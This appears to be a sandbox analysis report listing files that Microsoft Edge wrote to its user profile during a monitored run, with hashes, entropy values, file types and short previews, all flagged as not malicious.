                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):423
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.234364745651527
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:j9MIvVaYebvqBZFUt83WJ/+4P5OaYebvqBaJ:Z5VaYebvyg83WlBOaYebvL
                                                                                                                                                                                                                                                                                                        MD5:0A25DB5379181F44CA6694E5C18E703B
                                                                                                                                                                                                                                                                                                        SHA1:10EFFC832C834CC7EA3E55A74D27A4DB8D9AEF9C
                                                                                                                                                                                                                                                                                                        SHA-256:129E99E690845E38812E143372BED5FC9C3C41E957379C8084DE01839F079CFF
                                                                                                                                                                                                                                                                                                        SHA-512:DA17C5F9F235F836651528B67FC8C2E190AA1A3C333F38A29B218D6642B2E1A2021B20755B41C8FF915EBD3FEE47AF5AADD1724A83CD5DCE3AC3ABEA2A8AE31B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:37.277 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/24-13:28:37.278 b90 Recovering log #3.2024/12/24-13:28:37.281 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):423
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.234364745651527
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:j9MIvVaYebvqBZFUt83WJ/+4P5OaYebvqBaJ:Z5VaYebvyg83WlBOaYebvL
                                                                                                                                                                                                                                                                                                        MD5:0A25DB5379181F44CA6694E5C18E703B
                                                                                                                                                                                                                                                                                                        SHA1:10EFFC832C834CC7EA3E55A74D27A4DB8D9AEF9C
                                                                                                                                                                                                                                                                                                        SHA-256:129E99E690845E38812E143372BED5FC9C3C41E957379C8084DE01839F079CFF
                                                                                                                                                                                                                                                                                                        SHA-512:DA17C5F9F235F836651528B67FC8C2E190AA1A3C333F38A29B218D6642B2E1A2021B20755B41C8FF915EBD3FEE47AF5AADD1724A83CD5DCE3AC3ABEA2A8AE31B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:37.277 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/24-13:28:37.278 b90 Recovering log #3.2024/12/24-13:28:37.281 b90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.203070070574287
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXh7cHlL+q2PN723oH+TcwtpIFUt8EXh7cHz1Zmw+EXhWoFLVkwON723oH+Tcwt7:Zh7kIvVaYebmFUt8Kh7kz1/+KhWs5OaT
                                                                                                                                                                                                                                                                                                        MD5:720CB3B292028CEFD8E12CEAE57E7664
                                                                                                                                                                                                                                                                                                        SHA1:F6DAA0ABA6089D81D8CFC4E1B1893CB68C936BFC
                                                                                                                                                                                                                                                                                                        SHA-256:07C7BA6479DF3680A0872526B3E453CAF84FF0F3BB0F513EB35F3B08C434BF3B
                                                                                                                                                                                                                                                                                                        SHA-512:36566140B50B5203DCCC07009DB3FECFB86A968D2FD2E20B7B15606D26ED4CEDFD217030DC19FC245EB2EAB7F94FA05095C9B69E9989B3B7E2403A82AFA9D352
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.772 1a98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/24-13:28:19.772 1a98 Recovering log #3.2024/12/24-13:28:19.773 1a98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.203070070574287
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXh7cHlL+q2PN723oH+TcwtpIFUt8EXh7cHz1Zmw+EXhWoFLVkwON723oH+Tcwt7:Zh7kIvVaYebmFUt8Kh7kz1/+KhWs5OaT
                                                                                                                                                                                                                                                                                                        MD5:720CB3B292028CEFD8E12CEAE57E7664
                                                                                                                                                                                                                                                                                                        SHA1:F6DAA0ABA6089D81D8CFC4E1B1893CB68C936BFC
                                                                                                                                                                                                                                                                                                        SHA-256:07C7BA6479DF3680A0872526B3E453CAF84FF0F3BB0F513EB35F3B08C434BF3B
                                                                                                                                                                                                                                                                                                        SHA-512:36566140B50B5203DCCC07009DB3FECFB86A968D2FD2E20B7B15606D26ED4CEDFD217030DC19FC245EB2EAB7F94FA05095C9B69E9989B3B7E2403A82AFA9D352
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.772 1a98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/24-13:28:19.772 1a98 Recovering log #3.2024/12/24-13:28:19.773 1a98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.2680272407768105
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:L/2qOB1nxCkMqSA1LyKOMq+8iP5GDHP/0jMVumE:Kq+n0Jq91LyKOMq+8iP5GLP/0R
                                                                                                                                                                                                                                                                                                        MD5:A24B9AECDB22ACB1A68C21B6F2ABD338
                                                                                                                                                                                                                                                                                                        SHA1:AC6A14792AA01781E21C1DF1776A72B86E99120B
                                                                                                                                                                                                                                                                                                        SHA-256:E6798C6EFE4FB00679922741727CB363956B5E44288E8006788E513981099D1A
                                                                                                                                                                                                                                                                                                        SHA-512:E89615B66B7999600EC6FA5AF31BDBB5D3985A948ABBC44CF3CC8B63B4662C3D4FCFBA3A17A50DDDE4E02B4226ED75D83FD57A940469F8C5A6A37289797BF1AD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4660221377316737
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBBoO:v7doKsKuKZKlZNmu46yjxf
                                                                                                                                                                                                                                                                                                        MD5:86BDDC25D9BD6976ADEAD934CCF44E44
                                                                                                                                                                                                                                                                                                        SHA1:22DB68CF0D8531A683A27465BAFECF489ACCA0A3
                                                                                                                                                                                                                                                                                                        SHA-256:89F4BAFBE625183AAACC8DE50A0439DCA16B0761C1764929BB7D22EB70D0D279
                                                                                                                                                                                                                                                                                                        SHA-512:C40109DA91CE7E42D3DE438FF2BC6A3C8C031A99E97385EEBF72348636BF4D14C785040BDCF2157F6462BB38C7D2B4DC2F81427D962D807CC5AB18697FBEA7EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):12824
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.13449110291207422
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:vlvlllNllv/etXlf80xllholl1qvTv4RRfs21d7jdtQfQ7u/w0xllsvWXtXlf80r:vlvMl/lholrpRS+dndRIlOCln
                                                                                                                                                                                                                                                                                                        MD5:0612613A892C11C56EEF0270F70387B7
                                                                                                                                                                                                                                                                                                        SHA1:CED14E6A4712D9A3915C8977CC9369BEA6C5890D
                                                                                                                                                                                                                                                                                                        SHA-256:2EE215C95D9D510B4767CDA1DEE9448FFE4252BD33C2001DDDA3D0917CFBD61F
                                                                                                                                                                                                                                                                                                        SHA-512:C7FA9BF31F64DCE6F5D68390C21C24E28137B912E184F11D9A972EE1956E4EE6F0FF492CABCDC97576AB991E31FB6891CD5891D73C22FE2691F8224ACD5B6800
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:..............i.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a0ee6985-01db-47c8-9b02-dc26a8a7baf2.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11755
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                                                                        MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                                                                        SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                                                                        SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                                                                        SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b9e349cf-1ba9-4efc-9cb5-c2ea8ce72942.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                        MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                        SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                        SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                        SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\fb8aa33d-8bd6-4f4e-9fc5-bcc50dc6aa51.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28366
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.55847994360738
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:YQzzCVWwL7pLGLht4W5wSgf4ql8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPsEIVq7pf:YQ2VDdcht4WaSgfzlu1jalbIa3t6R
                                                                                                                                                                                                                                                                                                        MD5:4A013F77E04FA27E6BD639C5A84DCA4E
                                                                                                                                                                                                                                                                                                        SHA1:EB6F940E41571A0B8A1884B1DC827FEDD830A807
                                                                                                                                                                                                                                                                                                        SHA-256:404623AA8E423F8042FA847E56264AE217BB7C7A4A5AD757799EE51809C2D19D
                                                                                                                                                                                                                                                                                                        SHA-512:76EE460D7AFE2B7917BCA66987300F487BCC620B348E1A88B3B22CE6FE3E93318C1843E30CFAE300E220DE236F720B3853C0168C9C6257ADCFF36D5AEC9D9DBD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379538499699763","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379538499699763","location":5,"ma

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.10234774519367401
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:+jsjxLspEjVl/PnnnnnnnnnnnvoQ/Eou:+jsjWoPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                        MD5:6553B7E3B17C5F8113F46F9A67A2FABA
                                                                                                                                                                                                                                                                                                        SHA1:189C5A52F556D8A5ED530624DEC74F73C2462ADF
                                                                                                                                                                                                                                                                                                        SHA-256:1CFCDF3C6D820F2E418F3602075BE8FAC50B38510020E106EABA5F4104537255
                                                                                                                                                                                                                                                                                                        SHA-512:B9DBE1D5FC547FDD9497439BA3D899D9124F1624DB26B8170A8E577107A3F9C071AE97C8DA3599D61E3FAA315B64BA4882EA2C2A0346B1D9819B5B14D945E728
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:..-.............M.......M.o.qe^.$J...V... {.....-.............M.......M.o.qe^.$J...V... {...........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):317272
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8900699826953017
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:xfv+3vAQv5VvknvYPvmCvt3vZzvSruvU21IvB8v8RyTyewIyAy8yyaxy1A:7r
                                                                                                                                                                                                                                                                                                        MD5:E7BFEEA0D4063F8876BD212E5BD0B695
                                                                                                                                                                                                                                                                                                        SHA1:412C18C589D0E03F5702091B84B33AF4455E1416
                                                                                                                                                                                                                                                                                                        SHA-256:1726A62DCB2CE731E364CF8C8652EB53EC2A8570379DD0A8FCA042F90EB052C8
                                                                                                                                                                                                                                                                                                        SHA-512:C320E2630B85E254F404A1570432F83EF1892D3B4FAE1824DBBD816E38B625220C2402170442BE003FB5292D4354650F03607DD6416D0FCC50BF197B51B655A3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):628
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2463408753900866
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuuP8A:pHayp
                                                                                                                                                                                                                                                                                                        MD5:B468E199B505EAA4FA2B783110178BB6
                                                                                                                                                                                                                                                                                                        SHA1:2047889416562660ED243A337B773407E87B8626
                                                                                                                                                                                                                                                                                                        SHA-256:5A62B421BB390CE95EDC22BC62388190B54BE7AFADA1F9109141D8C62E7FD18A
                                                                                                                                                                                                                                                                                                        SHA-512:D870589DBB89F609C46C1C09CFFFF3EC39EBB69D3CB302FD0F03990AA67C588F3021AC4AE8F0D0E5085D89FA4B521C60C8ECD91639C152CE4B5320B2DCEA3086
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=................P..0................39_config..........6.....n ...1

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):325
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.217753065412729
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NkRB3+q2PN723oH+TcwtfrK+IFUt8E22NZmw+E22RVkwON723oH+TcwtfrUeLJ:WcvVaYeb23FUt8J2N/+J2/5OaYeb3J
                                                                                                                                                                                                                                                                                                        MD5:506871B8D8519B8E1FB85A28319C13DC
                                                                                                                                                                                                                                                                                                        SHA1:80AB6F2E965B0619044228F16C40DCC5A662C73D
                                                                                                                                                                                                                                                                                                        SHA-256:59369C21B99E9C5960F5C6080BA48195DC8E759EA20298CC7D9EC8548CA6AEBB
                                                                                                                                                                                                                                                                                                        SHA-512:2408D729E52D6D15C56AEAF9162610B7F06DDC8B13CDB20B6A443D38267AE39BA1810EE16A0788B873133BD278578C5297883B8DD221FB1F9E6A395D17085EA0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.614 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/24-13:28:20.709 db8 Recovering log #3.2024/12/24-13:28:20.709 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

